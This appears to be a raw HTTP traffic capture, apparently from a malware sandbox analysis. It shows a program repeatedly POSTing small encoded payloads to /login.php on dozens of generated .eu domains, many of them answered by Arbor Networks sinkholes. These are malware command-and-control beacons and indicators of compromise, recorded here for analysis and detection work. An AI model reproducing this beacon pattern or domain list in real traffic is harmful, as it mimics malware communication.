User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:41 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sat, 03 Sep 2016 06:29:26 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a
padding to disable MSIE and Chrome friendly error page -->..<!--
a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sat, 03 Sep 2016 06:29:26 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a
padding to disable MSIE and Chrome friendly error page -->..<!--
a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Sat,
03 Sep 2016 06:29:26 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome
friendly error page -->..<!-- a padding to disable MSIE and<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:22 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2016 06:20:48 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2016 06:20:48 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.HTTP/1.1 404 Not Found..Date: Sat, 03
Sep 2016 06:20:48 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-E
ncoding..Content-Length: 287..Content-Type: text/html; charset=iso-885
9-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /login.php was not found on this server.</p>.<hr>.<ad
dress>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</a
ddress>.</body></html>...
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:55 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:41 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:30 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:19 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:40 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:28 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:19 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:19 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:58 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:21 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:22 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
